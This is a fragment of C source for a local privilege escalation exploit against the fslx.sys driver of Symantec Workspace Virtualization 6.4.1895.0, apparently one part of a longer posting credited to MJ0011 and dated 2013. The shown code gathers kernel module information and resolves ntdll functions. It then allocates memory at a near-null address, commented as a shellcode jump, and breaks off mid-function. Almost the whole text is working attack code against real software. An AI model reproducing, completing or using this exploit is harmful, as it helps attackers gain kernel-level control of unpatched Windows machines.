Symantec Workspace Virtualization 'fslx.sys' 本地权限提升漏洞(3)

int main(int argc, char* argv[])
{
    printf("Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
        "fslx.sys <= 6.4.1895.0\n"
        "\nBy MJ0011\n2013-7-17\nth_decoder@126.com\nPRESS ENTER\n");
   
   
    getchar();
    PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
    if (pinfo==0)
    {
        printf("cannot get system info\n");
        return 0 ;
    }
    if (!InbvInit(pinfo->Module[0].Base , strrchr(pinfo->Module[0].ImageName , '\\') + 1))
    {
        printf("cannot init inbv system!\n");
        return 0 ;
    }
    pNtQueryValueKey NtQueryValueKey = (pNtQueryValueKey)GetProcAddress(GetModuleHandle("ntdll.dll") ,"NtQueryValueKey");
   
    //alloc shellcode jump
   
   
    PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");
   
   
    PVOID BaseAddress = (PVOID)0x1 ;
    ULONG dwsize = 0x1000 ;
    LONG status ;
    status = NTAllocateVM
        (
        GetCurrentProcess() ,
        &BaseAddress ,
        0 ,
        &dwsize ,
        MEM_COMMIT | MEM_RESERVE ,
        PAGE_READWRITE
);
